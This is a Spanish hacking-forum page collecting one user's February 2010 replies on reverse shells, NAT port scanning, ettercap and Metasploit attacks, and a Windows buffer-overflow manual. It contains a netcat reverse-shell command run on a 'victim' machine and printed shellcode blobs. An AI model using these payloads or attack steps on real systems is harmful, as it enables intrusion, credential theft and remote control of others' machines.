Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ikary

#31
Hacking / Re: Redirigir una IP a otra IP
28 Febrero 2010, 12:38 PM
Con netcat puedes poner a la escucha un puerto en una maquina y pasarle una shell desde otra.

Servidor(tu): nc -l -p 2000 pones a la escucha un puerto en tu maquina

Cliente(victima): nc aqui.tu.ip.com 2000 -e cmd.exe realiza una conexion inversa hacia tu maquina y le pasa una cmd.exe a esta.

Un saludo
#32
Hacking / Re: Extraño escaneo
26 Febrero 2010, 17:03 PM
Citarpero puedes estar seguro que lo unico que quiero es aprender.
Bien, en ese caso, reitero mis discuplas winnipu. La pregunta principal estaba bien creada, respetuosa y en el foro correcto, y respondí, en la medida de lo posible, de igual manera.

Pero debes entender que hay muchisima gente que no busca aprender, si no "incordiar", y la posicion que mencionaste me pareció una excusa más de ese tipo de gente. Que ya ha quedado claro que no.

Bueno, volviendo a lo tuyo...  ;D

Un router dispone de 2 o mas salidas. Estos tienen la capacidad de pertenecer a una red privada(192.168.1.x) en una de sus salidas y a una publica (80.32.56.89) en la otra.

Lo que tienes del router hacia adentro se comenzaria a especificar como LAN(privada), y hacia afuera como WAN(publica).
Para que el router sepa a quien pertenece cada paquete recibido desde el exterior al interior se utiliza "Traduccion NAT" (Lo que se conoce comunmente por ¿Como abro los puertos del router? XD)
De esta manera, si un paquete llegado desde el exterior es dirigido a un puerto especifico, el router mirará su tabla y redireccionará el paquete hacia el host según se haya especificado.

Sabiendo esto (investiga un poco sobre NAT) deducirás la forma de escanear un host especifico desde el exterior en una red LAN.

Una pista: La mayoria de la gente no cambia las contraseñas de los routers XDDD

Bueno, espero que te sirva, y disculpa otra vez por el malentendido

Un saludo
#33
Hacking / Re: Extraño escaneo
26 Febrero 2010, 14:33 PM
Realmente no me convence tu historia de que un amigo tuyo te dejara escanearlo... (si me equivoco, perdon, pero no sabes la de gente que aparece por aqui con preguntas similares)

Para empezar prueba a escanearte tu mismo y verás la solucion, abrete un puerto y redirigelo hacia tu ordenador y escaneate desde el exterior.

Un saludo
#35
Hacking / Re: Extraño escaneo
25 Febrero 2010, 20:49 PM
CitarQue diantres es esto? Un honeypot?
...O un router  :P

Cuando escaneas una ip, lo primero con lo que te encuentras es con su router, y detrás de este estará su maquina. Para escanear el host en si, deberia abrir los puertos del router y redirigirlos hacia este.

Un saludo
#36
Citarel modem es un 2wire 2701HG-T Gateway
Concretamente sobre ese modelo solo e encontrado que sea un Router, no un Modem.

Por lo que cuentas, entiendo que alguien ha entrado en tu LAN e intentas darle la vuelta a la situacion ¿verdad?

Si no me equivoco, y lo que tienes es un router, puedes perfectamente usar ettercap para sniffear el trafico, pero no solo eso... Puedes usar ettercap para capturar contraseñas, redirigir el trafico, e incluso crear un ataque con el cual sacar una shell remota en el equipo infiltrado.

Hay manuales suficientes en este foro para realizar un ataque conjunto entre Metasploit y ettercap. Busca informacion sobre los 2 y verás el potencial que tienen los dos juntos.

Ettercap: MitM, dns_spoof, web_browser.
Metasploit: Categoria "/browser", db_Autopwn... (mirate los manuales de Shell Root, encontrarás mil formas de explotar el host)
Nmap: Inprescindible  :silbar:

Si ves esto complicado, opta por cambiar la codificacion por WPA y listo ^^

Un saludo
#37
Hacking / Re: [Manual] Buffer Overflow en Windows
16 Febrero 2010, 15:00 PM
Gracias Anon ^^
Ya he estado mirando el otro post, voy a probar lo que dices a ver, por que la verdad es que me quedé con las ganas de sacarlo por parametros. :P

PHAMTOM:
Citarcreo que se encuentran mejores payloads

Realmente es todo lo contrario, si no, fijate en tu shellcode:
"\x89\xe0\xd9\xc0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x45\x50\x47\x70\x43" .
"\x30\x45\x30\x4f\x79\x4b\x55\x46\x51\x49\x42\x50\x64\x4c" .
"\x4b\x50\x52\x50\x30\x4e\x6b\x51\x42\x44\x4c\x4c\x4b\x50" .
"\x52\x46\x74\x4e\x6b\x42\x52\x45\x78\x44\x4f\x4c\x77\x50" .
"\x4a\x46\x46\x50\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x47" .
"\x4c\x43\x51\x51\x6c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48" .
"\x4f\x44\x4d\x47\x71\x4b\x77\x49\x72\x4a\x50\x50\x52\x51" .
"\x47\x4c\x4b\x51\x42\x46\x70\x4e\x6b\x42\x62\x47\x4c\x47" .
"\x71\x48\x50\x4c\x4b\x47\x30\x42\x58\x4d\x55\x4f\x30\x44" .
"\x34\x51\x5a\x45\x51\x48\x50\x42\x70\x4e\x6b\x43\x78\x45" .
"\x48\x4c\x4b\x50\x58\x47\x50\x47\x71\x4e\x33\x4a\x43\x47" .
"\x4c\x47\x39\x4e\x6b\x45\x64\x4c\x4b\x43\x31\x48\x56\x46" .
"\x51\x49\x6f\x44\x71\x4b\x70\x4c\x6c\x49\x51\x48\x4f\x46" .
"\x6d\x47\x71\x48\x47\x46\x58\x4d\x30\x42\x55\x48\x74\x43" .
"\x33\x51\x6d\x48\x78\x47\x4b\x43\x4d\x51\x34\x50\x75\x4d" .
"\x32\x42\x78\x4c\x4b\x42\x78\x45\x74\x45\x51\x4a\x73\x51" .
"\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x51\x48\x45\x4c\x46" .
"\x61\x4b\x63\x4c\x4b\x45\x54\x4e\x6b\x46\x61\x4a\x70\x4b" .
"\x39\x47\x34\x45\x74\x45\x74\x51\x4b\x51\x4b\x50\x61\x46" .
"\x39\x51\x4a\x42\x71\x4b\x4f\x4d\x30\x42\x78\x51\x4f\x42" .
"\x7a\x4e\x6b\x46\x72\x48\x6b\x4f\x76\x43\x6d\x43\x5a\x46" .
"\x61\x4c\x4d\x4d\x55\x4c\x79\x43\x30\x47\x70\x43\x30\x50" .
"\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x4b" .
"\x65\x4f\x4b\x49\x70\x47\x6d\x47\x5a\x45\x5a\x51\x78\x4f" .
"\x56\x4f\x65\x4f\x4d\x4f\x6d\x49\x6f\x4e\x35\x45\x6c\x47" .
"\x76\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x44\x35\x43" .
"\x35\x4f\x4b\x43\x77\x46\x73\x50\x72\x42\x4f\x50\x6a\x47" .
"\x70\x51\x43\x49\x6f\x4b\x65\x45\x33\x42\x4d\x42\x44\x45" .
"\x50\x44\x4a\x41\x41";


Y en la de Anon:

"\x55\x8B\xEC\x33\xC9\x51\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\x88\x4D\xFB\x8D\x45\xF8\x50\xBB\xc7\x93\xbf\x77\xFF\xD3"


Hay demasiada diferencia para dos shellcodes que hacen lo mismo ¿no crees? ^^

Para mi manual utilicé las shellcodes de metasploit para hacerlo mas rapido, ya que el manual se basaba mas bien en el concepto de BoF que en la creacion de shellcodes (el manual de Rojodos ya lo explicaba con bastante claridad)
Te recomiendo, si no lo has echo aun, que leas el manual de Rojodos y aprendas a crear tus propias shellcodes, ya que pocas veces vas a encontrar 700 bytes en un programa explotable real.

CitarMuy bueno ikary, buenisimo el manual,ahi termine de aprender Local BoF

Gracias PHAMTOM, me alegra que te haya servido ^^

Un saludo
#38
Hacking / Re: [Manual] Buffer Overflow en Windows
12 Febrero 2010, 01:59 AM
Cita de: yoyahack en 11 Febrero 2010, 02:25 AM
Bueno, aunque no uso window  desde hace tiempo
El manual lo enfoqué en sistemas Windows por la poca documentacion en español que habia sobre este ataque. Además que considero muy importante conocer los metodos de explotacion no solo de un tipo especifico de SO, nunca sabes lo que te vas a encontrar durante un ataque real. Los extremos no son buenos  :silbar:
Citarvi estubo muy bien documentando, y la explicacion de las memoria igual xD.
CitarExcelente manual para nobatos como yo  :P:P
Gracias ^^ me alegro que le sirva de algo a alguien  :D
Citarte e subido el archivo a Mega
Gracias, lo añado al post principal ^^

Un saludo
#39
Hacking / Re: [Manual] Buffer Overflow en Windows
11 Febrero 2010, 01:24 AM
Cita de: Anon en  8 Febrero 2010, 23:38 PM
Muy buen manual, de hecho, cuando lei la lista del contenido me llego un dejavu, y la verdad no supe que es lo que cambio en la matrix xD


XDDDD
Gracias Anon  ;D

Ahora estoy preparando todo para hacer el video y terminar de modificar algunas cosillas que me han ido diciendo por privado.
Cuando termine con el CEH intentare hacer uno parecido pero en remote  :silbar:

PD: agrego tu link al post principal.

Un saludo
#40
Cita de: Shell Root en  8 Febrero 2010, 20:03 PM
Edit: Está Very Nice!

Gracias ShellRoot  ;)

Por cierto, olvidé añadir a las referencias un manual de Ollydbg muy bueno y me acavo de dar cuenta  :-[

Lo pongo aqui y voy a editar el pdf.

Link: http://usuarios.multimania.es/elmundounderground/Textos/Cracking/Ollydbg.rar

Edito: Ya esta actualizado el pdf  ;-)

Un saludo